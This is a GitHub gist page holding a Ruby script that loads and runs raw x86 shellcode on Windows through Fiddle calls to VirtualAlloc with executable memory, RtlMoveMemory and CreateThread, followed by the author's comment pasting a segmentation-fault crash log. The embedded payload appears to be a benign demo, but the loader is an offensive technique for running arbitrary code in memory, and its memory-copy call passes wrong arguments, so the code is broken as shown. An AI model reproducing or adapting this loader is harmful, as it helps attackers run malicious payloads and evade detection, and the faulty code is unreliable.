Skip to content

Instantly share code, notes, and snippets.

@KINGSABRI

KINGSABRI/inject_shellcode_ruby.rb Secret

Last active July 20, 2018 21:02
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save KINGSABRI/1871e748b51b6ef5c8f61a49a909b8c3 to your computer and use it in GitHub Desktop.
Save KINGSABRI/1871e748b51b6ef5c8f61a49a909b8c3 to your computer and use it in GitHub Desktop.
Download ZIP
Execute Shellcode from Ruby
Raw
inject_shellcode_ruby.rb
# KING SABRI
require 'fiddle'
require 'fiddle/import'
require 'fiddle/types'
shellcode_calc =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" +
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" +
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" +
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" +
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" +
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" +
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" +
"\x49\x0b\x31\xc0\x51\x50\xff\xd7"
kernel32 = Fiddle.dlopen('kernel32')
virtual_alloc = Fiddle::Function.new(
kernel32['VirtualAlloc'],
[Fiddle::TYPE_INT, Fiddle::TYPE_INT, Fiddle::TYPE_INT, Fiddle::TYPE_INT],
Fiddle::TYPE_INT
)
rtl_move_memory = Fiddle::Function.new(
kernel32['RtlMoveMemory'],
[Fiddle::TYPE_INT, Fiddle::TYPE_INT, Fiddle::TYPE_INT],
Fiddle::TYPE_INT
)
create_thread = Fiddle::Function.new(
kernel32['CreateThread'],
[Fiddle::TYPE_INT, Fiddle::TYPE_INT, Fiddle::TYPE_INT, Fiddle::TYPE_INT, Fiddle::TYPE_INT, Fiddle::TYPE_INT, Fiddle::TYPE_INT],
Fiddle::TYPE_INT
)
wait_for_single_object = Fiddle::Function.new(
kernel32['WaitForSingleObject'],
[Fiddle::TYPE_INT, Fiddle::TYPE_INT],
Fiddle::TYPE_INT
)
# buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
buf = shellcode_calc.chars
# ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
puts "[-] VirtualAlloc"
ptr = virtual_alloc.call(0, shellcode_calc.size, 0x3000, 0x40)
# ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode)))
puts "[-] RtlMoveMemory"
rtl_move_memory.call(ptr.to_i, buf.size.to_i, shellcode_calc.size.to_i)
# ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),
# ctypes.c_int(0),ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
puts "[-] CreateThread"
ht = create_thread.call(0, 0, ptr, 0, 0, 0)
# ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
puts "[-] WaitForSingleObject"
wait_for_single_object.call(ht, -1)
@KINGSABRI
Copy link
Author

The Error

PS C:\Users\KING\Desktop\c> ruby ruby2shellcode-1.rb > error.txt
ruby2shellcode-1.rb:53: [BUG] Segmentation fault
ruby 2.5.1p57 (2018-03-29 revision 63029) [i386-mingw32]

-- Control frame information -----------------------------------------------
c:0003 p:---- s:0022 e:000021 CFUNC  :call
c:0002 p:0406 s:0015 E:001094 EVAL   ruby2shellcode-1.rb:53 [FINISH]
c:0001 p:0000 s:0003 E:000d68 (none) [FINISH]

-- Ruby level backtrace information ----------------------------------------
ruby2shellcode-1.rb:53:in `<main>'
ruby2shellcode-1.rb:53:in `call'

-- C level backtrace information -------------------------------------------
C:\Windows\SYSTEM32\ntdll.dll(KiFastSystemCallRet+0x0) [0x770f38b0]
C:\Windows\System32\KERNELBASE.dll(WaitForSingleObject+0x12) [0x73f621b2]
C:\Ruby25\bin\msvcrt-ruby250.dll(rb_print_backtrace+0x40) [0x62a8aa60]
C:\Windows\SYSTEM32\ntdll.dll(WinSqmEventWrite+0x144cb) [0x7711a48b]

-- Other runtime information -----------------------------------------------

* Loaded script: ruby2shellcode-1.rb

* Loaded features:

    0 enumerator.so
    1 thread.rb
    2 rational.so
    3 complex.so
    4 C:/Ruby25/lib/ruby/2.5.0/i386-mingw32/enc/encdb.so
    5 C:/Ruby25/lib/ruby/2.5.0/i386-mingw32/enc/trans/transdb.so
    6 C:/Ruby25/lib/ruby/2.5.0/i386-mingw32/enc/windows_1252.so
    7 C:/Ruby25/lib/ruby/2.5.0/i386-mingw32/rbconfig.rb
    8 C:/Ruby25/lib/ruby/2.5.0/rubygems/compatibility.rb
    9 C:/Ruby25/lib/ruby/2.5.0/rubygems/defaults.rb
   10 C:/Ruby25/lib/ruby/2.5.0/rubygems/deprecate.rb
   11 C:/Ruby25/lib/ruby/2.5.0/rubygems/errors.rb
   12 C:/Ruby25/lib/ruby/2.5.0/rubygems/version.rb
   13 C:/Ruby25/lib/ruby/2.5.0/rubygems/requirement.rb
   14 C:/Ruby25/lib/ruby/2.5.0/rubygems/platform.rb
   15 C:/Ruby25/lib/ruby/2.5.0/rubygems/basic_specification.rb
   16 C:/Ruby25/lib/ruby/2.5.0/rubygems/stub_specification.rb
   17 C:/Ruby25/lib/ruby/2.5.0/rubygems/util/list.rb
   18 C:/Ruby25/lib/ruby/2.5.0/i386-mingw32/stringio.so
   19 C:/Ruby25/lib/ruby/2.5.0/uri/rfc2396_parser.rb
   20 C:/Ruby25/lib/ruby/2.5.0/uri/rfc3986_parser.rb
   21 C:/Ruby25/lib/ruby/2.5.0/uri/common.rb
   22 C:/Ruby25/lib/ruby/2.5.0/uri/generic.rb
   23 C:/Ruby25/lib/ruby/2.5.0/uri/ftp.rb
   24 C:/Ruby25/lib/ruby/2.5.0/uri/http.rb
   25 C:/Ruby25/lib/ruby/2.5.0/uri/https.rb
   26 C:/Ruby25/lib/ruby/2.5.0/uri/ldap.rb
   27 C:/Ruby25/lib/ruby/2.5.0/uri/ldaps.rb
   28 C:/Ruby25/lib/ruby/2.5.0/uri/mailto.rb
   29 C:/Ruby25/lib/ruby/2.5.0/uri.rb
   30 C:/Ruby25/lib/ruby/2.5.0/rubygems/specification.rb
   31 C:/Ruby25/lib/ruby/2.5.0/rubygems/exceptions.rb
   32 C:/Ruby25/lib/ruby/site_ruby/2.5.0/ruby_installer/runtime/singleton.rb
   33 C:/Ruby25/lib/ruby/site_ruby/2.5.0/ruby_installer/runtime.rb
   34 C:/Ruby25/lib/ruby/site_ruby/2.5.0/ruby_installer/runtime/msys2_installation.rb
   35 C:/Ruby25/lib/ruby/2.5.0/i386-mingw32/fiddle.so
   36 C:/Ruby25/lib/ruby/2.5.0/fiddle/function.rb
   37 C:/Ruby25/lib/ruby/2.5.0/fiddle/closure.rb
   38 C:/Ruby25/lib/ruby/2.5.0/fiddle.rb
   39 C:/Ruby25/lib/ruby/site_ruby/2.5.0/ruby_installer/runtime/dll_directory.rb
   40 C:/Ruby25/lib/ruby/2.5.0/i386-mingw32/enc/utf_16le.so
   41 C:/Ruby25/lib/ruby/2.5.0/i386-mingw32/enc/trans/utf_16_32.so
   42 C:/Ruby25/lib/ruby/2.5.0/rubygems/defaults/operating_system.rb
   43 C:/Ruby25/lib/ruby/2.5.0/rubygems/dependency.rb
   44 C:/Ruby25/lib/ruby/2.5.0/rubygems/core_ext/kernel_gem.rb
   45 C:/Ruby25/lib/ruby/2.5.0/monitor.rb
   46 C:/Ruby25/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb
   47 C:/Ruby25/lib/ruby/2.5.0/rubygems.rb
   48 C:/Ruby25/lib/ruby/2.5.0/rubygems/path_support.rb
   49 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/version.rb
   50 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/core_ext/name_error.rb
   51 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/levenshtein.rb
   52 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/jaro_winkler.rb
   53 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/spell_checker.rb
   54 C:/Ruby25/lib/ruby/2.5.0/delegate.rb
   55 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/spell_checkers/name_error_checkers/class_name_checker.rb
   56 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/spell_checkers/name_error_checkers/variable_name_checker.rb
   57 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/spell_checkers/name_error_checkers.rb
   58 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/spell_checkers/method_name_checker.rb
   59 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/spell_checkers/key_error_checker.rb
   60 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/spell_checkers/null_checker.rb
   61 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean/formatters/plain_formatter.rb
   62 C:/Ruby25/lib/ruby/gems/2.5.0/gems/did_you_mean-1.2.0/lib/did_you_mean.rb
   63 C:/Ruby25/lib/ruby/2.5.0/fiddle/value.rb
   64 C:/Ruby25/lib/ruby/2.5.0/fiddle/pack.rb
   65 C:/Ruby25/lib/ruby/2.5.0/fiddle/struct.rb
   66 C:/Ruby25/lib/ruby/2.5.0/fiddle/cparser.rb
   67 C:/Ruby25/lib/ruby/2.5.0/fiddle/import.rb
   68 C:/Ruby25/lib/ruby/2.5.0/fiddle/types.rb

[NOTE]
You may have encountered a bug in the Ruby interpreter or extension libraries.
Bug reports are welcome.
For details: http://www.ruby-lang.org/bugreport.html


This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
PS C:\Users\KING\Desktop\c>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment